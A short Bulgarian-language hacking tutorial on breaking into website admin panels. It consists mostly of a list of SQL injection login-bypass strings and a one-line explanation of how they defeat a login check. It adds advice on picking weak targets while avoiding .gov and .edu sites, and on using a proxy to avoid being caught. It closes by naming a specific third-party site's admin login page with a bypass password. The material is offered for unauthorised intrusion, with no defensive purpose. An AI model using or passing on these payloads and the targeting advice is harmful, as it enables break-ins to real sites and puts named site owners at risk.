Как да хакнем админ панела на някой сайт.

Сега ще се научим как да хакнем админ панела на някой сайт.

Лист с инжекции:

admin'--

1'or'1'='1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

Как работи?: SQL инжекцията вкарва код в mysql датабазата ,който преминава през security логина.

Съвети:

• Не го пробвайте на .gov или .edu сайтове.
  
• Не го пробвайте на сайтове, които изглеждат наистина сложни (data.bg,vbox7.com и т.н.)
  
• Пробвайте го на сайтове, които записват фалшиви регистрации
  
• Бъдете сигурни, че не пише powered by и след това име на някоя компания
  
• Използвайте proxy, ако мислите, че ще ви хванат
  

Използваният сайт е: http://www.hockeyrecruit.com/admin/login.asp
Акаунт: admin
Парола: 1'or'1'='1

Video: